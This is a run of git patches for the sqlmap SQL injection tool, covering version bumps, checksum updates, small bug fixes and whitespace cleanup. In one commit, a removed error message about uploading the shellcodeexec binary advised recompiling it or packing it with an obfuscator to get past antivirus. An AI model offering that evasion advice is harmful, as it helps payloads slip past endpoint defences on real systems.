"\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()]) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a3ffdc22a23..f80319e4fb5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -50e82ed2cd620854ce6e74cf18781117 lib/core/settings.py +551c1eba020f0319b9206236b1aeac00 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 596988f14408cde1a2d3b5c9f231873a lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -e2b40b94446d59fb25abe68c429bae74 lib/request/connect.py +5b7f216827207c085df96bb56ed5e600 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From 5580db00452b1367bf4ab1971293b87f2b40109b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 24 Apr 2018 19:52:12 +0200 Subject: [PATCH 121/428] Fixes #3067 --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 695ab669672..e877dde5052 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3893,7 +3893,7 @@ def quote(s, safe): # urllib.quote(s.replace('%', '')) != s.replace('%', '') # which would trigger on all %-characters, e.g. "&". if getUnicode(s).encode("ascii", "replace") != s or forceQuote: - return urllib.quote(s.encode(UNICODE_ENCODING), safe=safe) + return urllib.quote(s.encode(UNICODE_ENCODING) if isinstance(s, unicode) else s, safe=safe) return s username = quote(parts.username, '') diff --git a/lib/core/settings.py b/lib/core/settings.py index 9ff6ff24319..d029fe5f38d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.20" +VERSION = "1.2.4.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f80319e4fb5..9055570eb72 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -9e88889d6fd9cb9a17e467b72ec30305 lib/core/common.py +f42e346d33199b4f663cff6efe2be775 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -551c1eba020f0319b9206236b1aeac00 lib/core/settings.py +2f9027a2ceb362b21119d335bbcdaa4c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 7d8fbab035126e19edba2c24ec7622a8a5e50298 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 26 Apr 2018 18:56:17 +0200 Subject: [PATCH 122/428] Fixes #3069 --- lib/core/settings.py | 2 +- lib/core/target.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d029fe5f38d..977652c7c6e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.21" +VERSION = "1.2.4.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 98d0de3b9da..abddc942834 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -230,7 +230,7 @@ def process(match, repl): if kb.customInjectionMark not in conf.data: # in case that no usable parameter values has been found conf.parameters[PLACE.POST] = conf.data - kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks + kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in (conf.data or "")) else kb.processUserMarks if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"): warnMsg = "you've provided target URL without any GET " diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9055570eb72..252fa7e25c6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,10 +46,10 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2f9027a2ceb362b21119d335bbcdaa4c lib/core/settings.py +2fb08059839ea1dc9972548c58e210e9 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py +6306284edcccc185b2df085438572b0d lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From 36b0ece2ad36be8f63d81e84c47d4a0b650172a9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 30 Apr 2018 11:02:01 +0200 Subject: [PATCH 123/428] Minor message update --- lib/core/settings.py | 2 +- lib/takeover/metasploit.py | 7 ++----- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 8 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 977652c7c6e..9532145459a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.22" +VERSION = "1.2.4.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index fb26052f862..8a8c0b74d45 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -675,13 +675,10 @@ def uploadShellcodeexec(self, web=False): written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True) if written is not True: - errMsg = "there has been a problem uploading shellcodeexec, it " + errMsg = "there has been a problem uploading shellcodeexec. It " errMsg += "looks like the binary file has not been written " errMsg += "on the database underlying file system or an AV has " - errMsg += "flagged it as malicious and removed it. In such a case " - errMsg += "it is recommended to recompile shellcodeexec with " - errMsg += "slight modification to the source code or pack it " - errMsg += "with an obfuscator software" + errMsg += "flagged it as malicious and removed it" logger.error(errMsg) return False diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 252fa7e25c6..343ffa0d1d2 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2fb08059839ea1dc9972548c58e210e9 lib/core/settings.py +f7b4a41eb39e717f89c55b0a90348e87 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -82,7 +82,7 @@ aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py 8d31425f36a7a9c093eb9bef44589593 lib/takeover/abstraction.py acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py -b1a6689e92e6ce998337bd41d8b09d6e lib/takeover/metasploit.py +46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py 4584ac6ee5c13d4d395f0a7a21d8478c lib/takeover/web.py From 8f7a7bed200cf79400a667109970981785fad86c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 3 May 2018 13:31:27 +0200 Subject: [PATCH 124/428] Minor patch --- lib/controller/checks.py | 25 +++++++++++++------------ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 16 insertions(+), 15 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index b0b42b5036e..510c022a9cc 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1522,18 +1522,19 @@ def checkNullConnection(): return kb.nullConnection is not None def checkConnection(suppressOutput=False): - if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)): - try: - debugMsg = "resolving hostname '%s'" % conf.hostname - logger.debug(debugMsg) - socket.getaddrinfo(conf.hostname, None) - except socket.gaierror: - errMsg = "host '%s' does not exist" % conf.hostname - raise SqlmapConnectionException(errMsg) - except socket.error, ex: - errMsg = "problem occurred while " - errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex)) - raise SqlmapConnectionException(errMsg) + if not re.search(r"\A\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z", conf.hostname): + if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)): + try: + debugMsg = "resolving hostname '%s'" % conf.hostname + logger.debug(debugMsg) + socket.getaddrinfo(conf.hostname, None) + except socket.gaierror: + errMsg = "host '%s' does not exist" % conf.hostname + raise SqlmapConnectionException(errMsg) + except socket.error, ex: + errMsg = "problem occurred while " + errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) if not suppressOutput and not conf.dummy and not conf.offline: infoMsg = "testing connection to the target URL" diff --git a/lib/core/settings.py b/lib/core/settings.py index 9532145459a..6bbc45864d5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.23" +VERSION = "1.2.5.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 343ffa0d1d2..e503c6e6b94 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -d9559f6c5053a7ccb524f3dd049e35f8 lib/controller/checks.py +aea19b45c6154035a689954719c753dc lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f7b4a41eb39e717f89c55b0a90348e87 lib/core/settings.py +1b801d825811ee4362e07e568e8a928e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From 2a810fb796589f7aaccd4287b37949468f04759d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 3 May 2018 14:10:55 +0200 Subject: [PATCH 125/428] Trivial modifications (thou shalt not judge people by trivial commits) --- extra/shutils/newlines.py | 31 ++++++++++++++++++++++++++ lib/controller/checks.py | 1 - lib/core/settings.py | 2 +- lib/parse/headers.py | 1 - lib/request/connect.py | 1 - lib/takeover/abstraction.py | 1 - lib/takeover/web.py | 1 - lib/techniques/dns/test.py | 1 - lib/techniques/dns/use.py | 1 - lib/utils/api.py | 7 ------ lib/utils/getch.py | 4 ---- lib/utils/search.py | 1 - plugins/dbms/db2/enumeration.py | 1 - plugins/dbms/db2/fingerprint.py | 1 - plugins/dbms/mssqlserver/__init__.py | 1 - plugins/dbms/sqlite/connector.py | 1 - sqlmap.py | 1 - txt/checksum.md5 | 33 ++++++++++++++-------------- 18 files changed, 49 insertions(+), 41 deletions(-) create mode 100644 extra/shutils/newlines.py diff --git a/extra/shutils/newlines.py b/extra/shutils/newlines.py new file mode 100644 index 00000000000..5fd91f96926 --- /dev/null +++ b/extra/shutils/newlines.py @@ -0,0 +1,31 @@ +#! /usr/bin/env python + +# Runs pylint on all python scripts found in a directory tree +# Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html + +import os +import re +import sys + +def check(filepath): + if filepath.endswith(".py"): + content = open(filepath, "rb").read() + #if re.search(r"\r?\n\r?\n", content): + if "\n\n\n" in content: + index = content.find("\n\n\n") + print filepath, repr(content[index-30:index+30]) + +if __name__ == "__main__": + try: + BASE_DIRECTORY = sys.argv[1] + except IndexError: + print "no directory specified, defaulting to current working directory" + BASE_DIRECTORY = os.getcwd() + + print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY + for root, dirs, files in os.walk(BASE_DIRECTORY): + if any(_ in root for _ in ("extra", "thirdparty")): + continue + for name in files: + filepath = os.path.join(root, name) + check(filepath) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 510c022a9cc..d1a26ade315 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1562,7 +1562,6 @@ def checkConnection(suppressOutput=False): else: kb.errorIsNone = True - threadData = getCurrentThreadData() if kb.redirectChoice == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: diff --git a/lib/core/settings.py b/lib/core/settings.py index 6bbc45864d5..ee4adaa4c04 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.0" +VERSION = "1.2.5.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/headers.py b/lib/parse/headers.py index 1b3c225f319..1f42b171761 100644 --- a/lib/parse/headers.py +++ b/lib/parse/headers.py @@ -13,7 +13,6 @@ from lib.core.data import paths from lib.parse.handler import FingerprintHandler - def headersParser(headers): """ This function calls a class that parses the input HTTP headers to diff --git a/lib/request/connect.py b/lib/request/connect.py index 92c3f3509a0..2d6e5dfd07b 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -120,7 +120,6 @@ class WebSocketException(Exception): from thirdparty.odict.odict import OrderedDict from thirdparty.socks.socks import ProxyError - class Connect(object): """ This class defines methods used to perform HTTP requests diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py index eb653c9895b..490c8c2987e 100644 --- a/lib/takeover/abstraction.py +++ b/lib/takeover/abstraction.py @@ -27,7 +27,6 @@ from lib.takeover.web import Web from lib.takeover.xp_cmdshell import XP_cmdshell - class Abstraction(Web, UDF, XP_cmdshell): """ This class defines an abstraction layer for OS takeover functionalities diff --git a/lib/takeover/web.py b/lib/takeover/web.py index a907bc14905..8f5b5616d08 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -53,7 +53,6 @@ from lib.request.connect import Connect as Request from thirdparty.oset.pyoset import oset - class Web: """ This class defines web-oriented OS takeover functionalities for diff --git a/lib/techniques/dns/test.py b/lib/techniques/dns/test.py index 3910e1302ec..7a580e6e5c4 100644 --- a/lib/techniques/dns/test.py +++ b/lib/techniques/dns/test.py @@ -14,7 +14,6 @@ from lib.core.exception import SqlmapNotVulnerableException from lib.techniques.dns.use import dnsUse - def dnsTest(payload): logger.info("testing for data retrieval through DNS channel") diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py index 42914f16693..3cf607b5451 100644 --- a/lib/techniques/dns/use.py +++ b/lib/techniques/dns/use.py @@ -33,7 +33,6 @@ from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request - def dnsUse(payload, expression): """ Retrieve the output of a SQL query taking advantage of the DNS diff --git a/lib/utils/api.py b/lib/utils/api.py index 967340fc48a..52ee0f44265 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -104,9 +104,7 @@ def execute(self, statement, arguments=None): def init(self): self.execute("CREATE TABLE logs(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, time TEXT, level TEXT, message TEXT)") - self.execute("CREATE TABLE data(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, status INTEGER, content_type INTEGER, value TEXT)") - self.execute("CREATE TABLE errors(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, error TEXT)") class Task(object): @@ -199,7 +197,6 @@ def engine_get_returncode(self): def engine_has_terminated(self): return isinstance(self.engine_get_returncode(), int) - # Wrapper functions for sqlmap engine class StdDbOut(object): def __init__(self, taskid, messagetype="stdout"): @@ -573,7 +570,6 @@ def scan_data(taskid): logger.debug("[%s] Retrieved scan data and error messages" % taskid) return jsonize({"success": True, "data": json_data_message, "error": json_errors_message}) - # Functions to handle scans' logs @get("/scan//log//") def scan_log_limited(taskid, start, end): @@ -601,7 +597,6 @@ def scan_log_limited(taskid, start, end): logger.debug("[%s] Retrieved scan log messages subset" % taskid) return jsonize({"success": True, "log": json_log_messages}) - @get("/scan//log") def scan_log(taskid): """ @@ -621,7 +616,6 @@ def scan_log(taskid): logger.debug("[%s] Retrieved scan log messages" % taskid) return jsonize({"success": True, "log": json_log_messages}) - # Function to handle files inside the output directory @get("/download///") def download(taskid, target, filename): @@ -648,7 +642,6 @@ def download(taskid, target, filename): logger.warning("[%s] File does not exist %s" % (taskid, target)) return jsonize({"success": False, "message": "File does not exist"}) - def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER, username=None, password=None): """ REST-JSON API server diff --git a/lib/utils/getch.py b/lib/utils/getch.py index 65043421e4e..d2c204ac4c5 100644 --- a/lib/utils/getch.py +++ b/lib/utils/getch.py @@ -22,7 +22,6 @@ def __init__(self): def __call__(self): return self.impl() - class _GetchUnix(object): def __init__(self): __import__("tty") @@ -41,7 +40,6 @@ def __call__(self): termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) return ch - class _GetchWindows(object): def __init__(self): __import__("msvcrt") @@ -50,7 +48,6 @@ def __call__(self): import msvcrt return msvcrt.getch() - class _GetchMacCarbon(object): """ A function which returns the current ASCII key that is down; @@ -79,5 +76,4 @@ def __call__(self): (what, msg, when, where, mod) = Carbon.Evt.GetNextEvent(0x0008)[1] return chr(msg & 0x000000FF) - getch = _Getch() diff --git a/lib/utils/search.py b/lib/utils/search.py index 8c49b534e51..e2cca24b948 100644 --- a/lib/utils/search.py +++ b/lib/utils/search.py @@ -36,7 +36,6 @@ from lib.request.basic import decodePage from thirdparty.socks import socks - def _search(dork): """ This method performs the effective search on Google providing diff --git a/plugins/dbms/db2/enumeration.py b/plugins/dbms/db2/enumeration.py index b6b64ac0bee..e79d281a863 100644 --- a/plugins/dbms/db2/enumeration.py +++ b/plugins/dbms/db2/enumeration.py @@ -5,7 +5,6 @@ See the file 'LICENSE' for copying permission """ - from lib.core.data import logger from plugins.generic.enumeration import Enumeration as GenericEnumeration diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py index ed532a57b03..6a584b8a9c3 100644 --- a/plugins/dbms/db2/fingerprint.py +++ b/plugins/dbms/db2/fingerprint.py @@ -5,7 +5,6 @@ See the file 'LICENSE' for copying permission """ - from lib.core.common import Backend from lib.core.common import Format from lib.core.data import conf diff --git a/plugins/dbms/mssqlserver/__init__.py b/plugins/dbms/mssqlserver/__init__.py index 202d6193c1c..02a23e967f9 100644 --- a/plugins/dbms/mssqlserver/__init__.py +++ b/plugins/dbms/mssqlserver/__init__.py @@ -15,7 +15,6 @@ from plugins.dbms.mssqlserver.takeover import Takeover from plugins.generic.misc import Miscellaneous - class MSSQLServerMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): """ This class defines Microsoft SQL Server methods diff --git a/plugins/dbms/sqlite/connector.py b/plugins/dbms/sqlite/connector.py index ae2722a9aed..f214b39a32a 100644 --- a/plugins/dbms/sqlite/connector.py +++ b/plugins/dbms/sqlite/connector.py @@ -19,7 +19,6 @@ from lib.core.exception import SqlmapMissingDependence from plugins.generic.connector import Connector as GenericConnector - class Connector(GenericConnector): """ Homepage: http://pysqlite.googlecode.com/ and http://packages.ubuntu.com/quantal/python-sqlite diff --git a/sqlmap.py b/sqlmap.py index 49dadc22817..4593e715b42 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -108,7 +108,6 @@ def checkEnvironment(): for _ in ("SqlmapBaseException", "SqlmapShellQuitException", "SqlmapSilentQuitException", "SqlmapUserQuitException"): globals()[_] = getattr(sys.modules["lib.core.exception"], _) - def main(): """ Main function of sqlmap when running from command line. diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e503c6e6b94..87a490555df 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -16,12 +16,13 @@ d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_ 2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_ c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_ 220745c50d375dad7aefebf8ca3611ef extra/shutils/duplicates.py +1f33abe1a67493909d29a35ca72ecedb extra/shutils/newlines.py 71b9d4357c31db013ecda27433830090 extra/shutils/pylint.py c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -aea19b45c6154035a689954719c753dc lib/controller/checks.py +a0ae21cc46b8f5fd0afe0a173ceaab70 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1b801d825811ee4362e07e568e8a928e lib/core/settings.py +0f03fed8767ab10c9bf9789d4deb0bde lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -60,7 +61,7 @@ e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 5e46fac7f824ba8ab8003a1cd47d8af3 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py -aaad2a0d80f05eaebe52c71519b3dfc7 lib/parse/headers.py +6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py 33f21b11b7963062df8fa2292229df80 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py @@ -68,7 +69,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 596988f14408cde1a2d3b5c9f231873a lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -5b7f216827207c085df96bb56ed5e600 lib/request/connect.py +e9bbba4a133effeae86d146286f9116b lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py @@ -79,30 +80,30 @@ aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py aa7cb67139bbc57d67a728fd2abf80ed lib/request/rangehandler.py aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py 7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py -8d31425f36a7a9c093eb9bef44589593 lib/takeover/abstraction.py +747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py 46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py -4584ac6ee5c13d4d395f0a7a21d8478c lib/takeover/web.py +2665fa7eedb19a1b10ffe949999b75f1 lib/takeover/web.py f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py 2543e14cc7f6e239b49dd40f41bc34fa lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py -855355a1a216f6b267a5f089028f1cd8 lib/techniques/dns/test.py -733f3419ff2ea23f75bc24e36f4746d9 lib/techniques/dns/use.py +799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py +bad83c6386adf345fbc982bdafbe3b93 lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py a36be917cf86a5ee407c83d74567f324 lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py -c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py +8d99c07416df40350ff8836d9d79ebb5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py de9620f03231d8329ee8434884b6bacd lib/utils/deps.py -635ed692ab141d428d0957b71b25c1aa lib/utils/getch.py +f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py @@ -111,7 +112,7 @@ cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py 5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py -2e3e7213f50b52fc4d5a014a2ff8d163 lib/utils/search.py 